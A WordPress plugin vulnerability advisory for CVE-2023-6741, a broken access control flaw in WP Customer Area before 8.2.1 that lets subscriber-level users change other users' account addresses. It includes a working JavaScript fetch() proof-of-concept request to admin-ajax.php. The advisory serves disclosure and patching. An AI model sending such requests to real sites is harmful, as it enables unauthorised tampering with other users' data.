WordPress Plugin Vulnerabilities

WP Customer Area < 8.2.1 - Subscriber+ Account Address Update

Description

The plugin does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.

Proof of Concept

You may get the nonce from *your* save address form

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",
  },
  "body": 'action=cuar_save_address_for_owner&cuar_nonce=a73a7eab3b&owner[type]=usr&owner[ids][]=1&address_id=home_address&address[name]=hohohohoh',
  "method": "POST",
  "mode": "cors",
  "credentials": "include"
})
.then((response) => {
  return response.text();
})
.then((data) => {
  console.log(data);
});

Affects Plugins

Plugin icon
customer-area
Fixed in 8.2.1

References

CVE
CVE-2023-6741

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher
Krzysztof Zając (CERT PL)
Submitter
Krzysztof Zając (CERT PL)
Submitter website
https://cert.pl
Submitter twitter
cert_polska_en
Verified
Yes
WPVDB ID
9debe1ea-18ad-44c4-8078-68eb66d36c4a

Timeline

Publicly Published
2024-01-10 (about 4 months ago)
Added
2024-01-10 (about 4 months ago)
Last Updated
2024-01-10 (about 4 months ago)

Other

Published
Title
Published
2021-01-28
Title
uListing < 1.7 - Unauthenticated Arbitrary Roles and Capabilities Creation/Deletion
Published
2024-03-25
Title
Meta Box < 5.9.4 - Contributor+ Arbitrary Posts' Custom Field Disclosure
Published
2021-08-17
Title
PostX Gutenberg Blocks for Post Grid < 2.4.10 - Missing Access Controls
Published
2021-12-28
Title
LabTools <= 1.0 - Subscriber+ Arbitrary Publication Deletion
Published
2021-08-06
Title
Welcart e-Commerce < 2.2.8 - Authenticated System Information Disclosure